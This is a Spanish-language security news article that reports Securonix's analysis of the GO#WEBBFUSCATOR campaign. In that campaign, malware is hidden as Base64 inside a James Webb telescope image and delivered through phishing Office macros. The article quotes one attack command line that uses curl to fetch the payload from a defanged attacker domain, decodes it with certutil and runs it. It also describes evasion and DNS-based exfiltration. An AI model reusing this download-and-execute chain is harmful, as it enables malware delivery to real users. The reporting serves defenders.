Noticias

Los piratas informáticos propagan malware escondiéndolo en las imágenes del telescopio James Webb

Los investigadores de amenazas de la firma de ciberseguridad Securonix identificaron recientemente un ejemplo único de una campaña de ataque persistente basada en Golang rastreada como GO#WEBBFUSCATOR. Esta nueva y sofisticada campaña utiliza la primera imagen pública del Telescopio Espacial James Webb, SMACS 0723 y cargas del lenguaje de programación Golang para infectar el sistema de destino con el malware.

En el caso de los no expertos, Golang es un lenguaje de programación muy popular entre los ciberdelincuentes, ya que se puede usar en diferentes plataformas para apuntar a Windows, Mac y Linux. También ofrece una tasa de detección significativamente más baja contra el software de seguridad y una mayor resistencia a la ingeniería y el análisis.

En esta campaña, el malware se propaga a través de un correo electrónico de phishing, que contiene un archivo adjunto de Microsoft Office. Esto incluye una referencia externa oculta dentro de los metadatos del documento que descarga un archivo de plantilla malicioso.

Cuando se abre el documento, el archivo de plantilla malicioso («Geos-Rates.docx») se descarga y se guarda en el sistema. El archivo de plantilla contiene un script VB, que iniciará la primera fase de ejecución de código para este ataque cuando el usuario habilite Macros.

El código de macro VBA malicioso está configurado para ejecutarse automáticamente cuando las macros están habilitadas. Al igual que con las macros incluidas tradicionalmente, la plantilla incluye las funciones Auto_Open, AutoOpen y AutoExec.

Cuando se ejecuta el script, descarga una imagen JPG «OxB36F8GEEC634[.]jpg” del recurso remoto (“xmlschemeformat[.]com”), lo decodifica en un ejecutable (“msdllupdate.exe”) mediante certutil.exe y lo inicia.

Los expertos que descubrieron la imagen incluyen la foto SMACS 0723 del Telescopio Webb, publicada por la NASA en julio de 2022, y está frente al código Base64.

cmd.exe / c cd c:\users\test\appdata\local & curl hxxp://www[.]xmlschemeformat.com/update/2021/office/oxb36f8geec634.jpg -o oxb36f8geec634.jpg & certutil -decode oxb36f8geec634.jpg msdllupdate.exe & msdllupdate.exe

“El archivo de imagen es bastante interesante. Sirve como una imagen .jpg estándar como se ve en la imagen de abajo. Sin embargo, las cosas se ponen interesantes cuando se inspeccionan con un editor de texto”, dice el análisis publicado por los expertos.

Campaña GO#WEBBFUSCATOR

“La imagen contiene un código Base64 malicioso disfrazado de certificado incrustado. En el momento de la publicación, este archivo en particular no es detectado por todos los proveedores de antivirus según VirusTotal”.

Una vez desencriptada, la carga útil codificada en Base64 se guardará en un ejecutable de Windows de 64 bits (1,7 MB) llamado «msdllupdate.exe». El binario msdllupdate.exe utiliza varias técnicas de evasión para evadir la ejecución de AV y dificultar el análisis.

Las cadenas binarias codificadas se ofuscan aún más con ROT25, se compilan con el lenguaje de programación Go y se ofuscan con una técnica moderna de ayuda antiforense llamada Gobfuscation.

Los ensamblajes de Golang se codificaron mediante XOR con un desplazamiento de 0x20 bytes para ocultarlos de los analizadores. Además, los ensamblajes usan el cambio de casos para ayudar a las herramientas de seguridad a evitar la detección de firmas AV.

Cuando se ejecuta, el malware realiza conexiones DNS únicas. Los expertos determinaron que el archivo binario estaba aprovechando una técnica de ofuscación de datos DNS mediante el envío de consultas DNS únicas al servidor DNS C2 de destino.

“Esta técnica funciona mediante el envío de una cadena cifrada como un subdominio adjunto a la consulta de DNS. Hemos observado un comportamiento similar con herramientas de desfiltrado de DNS como DNSCAT2”, continúa el informe.

“Los mensajes cifrados y no cifrados se leen en el servidor C2, que muestra lo que hay primero. Esta práctica se puede utilizar para establecer un canal encriptado para comando y control, o para exfiltrar datos confidenciales”, dijo.

“En el caso de GO#WEBBFUSCATOR, la comunicación con el servidor C2 se implementa mediante solicitudes `TXT-DNS` mediante solicitudes `nslookup` al servidor controlado por el nombre del atacante. Toda la información está codificada en Base64”.

Los investigadores señalan que los dominios C2 empleados en esta campaña se registraron recientemente, siendo el último el 29 de mayo de 2022.

Securonix ha compartido indicadores de compromiso (IoC) junto con técnicas MITRE ATT&CK.

“En general, los TTP observados con GO#WEBBFUSCATOR durante toda la cadena de ataque son bastante interesantes. El uso de una imagen legítima para construir binarios de Golang con Certutil no es muy común en nuestra experiencia o típico y es algo que estamos siguiendo de cerca. El autor original del binario claramente diseñó la carga útil con metodologías forenses anti-aleatorias y anti-EDR en mente”, concluye el informe.

HackNarrow

Informático de profesión, me dedico a probar nuevas versiones de hardware y verificar la seguridad e integridad de servidores y firewalls. Escribo un poco sobre novedades en la rama de la seguridad informática en general.

Publicaciones relacionadas

Deja una respuesta

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *

Botón volver arriba
error: Content is protected !!